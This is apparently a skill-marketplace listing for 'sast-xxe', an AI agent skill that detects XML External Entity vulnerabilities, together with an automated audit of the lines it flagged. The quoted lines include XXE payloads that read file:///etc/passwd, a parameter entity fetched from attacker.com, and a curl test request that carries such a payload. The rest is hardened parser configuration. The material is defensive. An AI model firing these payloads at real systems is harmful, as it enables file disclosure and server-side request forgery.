sast-xxe

Detects XML External Entity (XXE) vulnerabilities in codebases using a structured three-phase approach for security assessments.

Install this skill

0/100

Security score

The sast-xxe skill was audited on Jun 6, 2026 and we found 20 security issues across 3 threat categories, including 3 critical. Review the findings below before installing.

Categories Tested

Security Issues

high line 490

Curl to non-GitHub URL

SourceSKILL.md

490	> curl -X POST https://app.example.com/api/import \

critical line 29

Access to /etc/passwd

SourceSKILL.md

29	- `SYSTEM` entity declarations that reference `file://` or `http://` URIs: `<!ENTITY xxe SYSTEM "file:///etc/passwd">`

critical line 492

Access to /etc/passwd

SourceSKILL.md

492	> -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'

critical line 493

Access to /etc/passwd

SourceSKILL.md

493	> Look for /etc/passwd content in the response body.]

low line 29

External URL reference

SourceSKILL.md

29	- `SYSTEM` entity declarations that reference `file://` or `http://` URIs: `<!ENTITY xxe SYSTEM "file:///etc/passwd">`

low line 31

External URL reference

SourceSKILL.md

31	- Parameter entity injection in DTDs: `<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;`

low line 33

External URL reference

SourceSKILL.md

33	- SSRF via XXE: using `http://` or `https://` external entity URLs to reach internal services

low line 52

External URL reference

SourceSKILL.md

52	dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

low line 53

External URL reference

SourceSKILL.md

53	dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

low line 54

External URL reference

SourceSKILL.md

54	dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

low line 62

External URL reference

SourceSKILL.md

62	spf.setFeature("http://xml.org/sax/features/external-general-entities", false);

low line 63

External URL reference

SourceSKILL.md

63	spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

low line 64

External URL reference

SourceSKILL.md

64	spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

low line 167

External URL reference

SourceSKILL.md

167	dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

low line 168

External URL reference

SourceSKILL.md

168	dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

low line 169

External URL reference

SourceSKILL.md

169	dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

low line 187

External URL reference

SourceSKILL.md

187	factory.setFeature("http://xml.org/sax/features/external-general-entities", false);

low line 188

External URL reference

SourceSKILL.md

188	factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

low line 189

External URL reference

SourceSKILL.md

189	factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

low line 490

External URL reference

SourceSKILL.md

490	> curl -X POST https://app.example.com/api/import \

Scanned on Jun 6, 2026

View Security Dashboard

Installation guide →

GitHub Stars 659

Rate this skill

Categorydevelopment

UpdatedJune 15, 2026

openclaw backend security-engineer backend-developer devops-sre development

utkusen/sast-skills